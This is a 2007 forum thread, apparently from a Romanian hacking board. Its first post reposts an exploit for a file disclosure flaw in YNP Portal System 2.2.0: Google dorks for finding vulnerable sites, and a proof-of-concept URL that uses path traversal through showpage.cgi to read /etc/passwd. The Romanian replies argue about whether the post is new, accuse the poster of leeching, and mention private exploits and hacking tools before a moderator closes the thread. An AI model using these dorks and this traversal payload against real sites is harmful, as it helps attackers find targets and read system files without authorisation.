Gonzalez Posted August 9, 2007 Report Posted August 9, 2007 ################################################################################## Discovered by: GoLd_M = [Mahmood_ali] ################################################################################### YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability ## D0rk : inurl:"showpage.cgi?p=popsearch.html" ## 0r : inurl:"showpage.cgi?p=support.html" ## 0r : inurl:"showpage.cgi?p=dialup.html" ## 0r : inurl:"showpage.cgi?p=" ## POC: [url]http://site.com/showpage.cgi?p=../../../../../../etc/passwd[/url] ################################################################################### Thanx : Tryag.Com/cc , Asb-May.Net/bb , bd0rk , Cold Zero , All My Friends ##################################################################################
d3v1l Posted August 9, 2007 Report Posted August 9, 2007 nu e 0day, e de luni chestia asta. si de ce nu l-ai postat tu atunci..il vroiai doar pt tine? :shock: [0DAY]YNP din pacate asa a fost publicat acest exploit...nu a pus gonzales oday :wink:
moubik Posted August 9, 2007 Report Posted August 9, 2007 eu trag rss-uri de la milworm, securitydot si alte cateva site-uri.ieri am avut 10 noi.sincer nu am mult timp ca sa postez. de abia am timp sa citesc ce mai apare pe aici.gonzalez e cam leecher dar e bine ca vine multa informatie aici.
Gonzalez Posted August 9, 2007 Author Report Posted August 9, 2007 eu trag rss-uri de la milworm, securitydot si alte cateva site-uri.ieri am avut 10 noi.sincer nu am mult timp ca sa postez. de abia am timp sa citesc ce mai apare pe aici.gonzalez e cam leecher dar e bine ca vine multa informatie aici.Leecher? Vrei sa-ti postez exploituri si hacking tools private la vreme nu? ( postez si dinalea, dar nu are rost sa-mi stric reputatia )Vezi-ti de drumul tau moubik!-Gonzalez
Guest Nemessis Posted August 9, 2007 Report Posted August 9, 2007 Certuri? Closed. Behave yourself guys.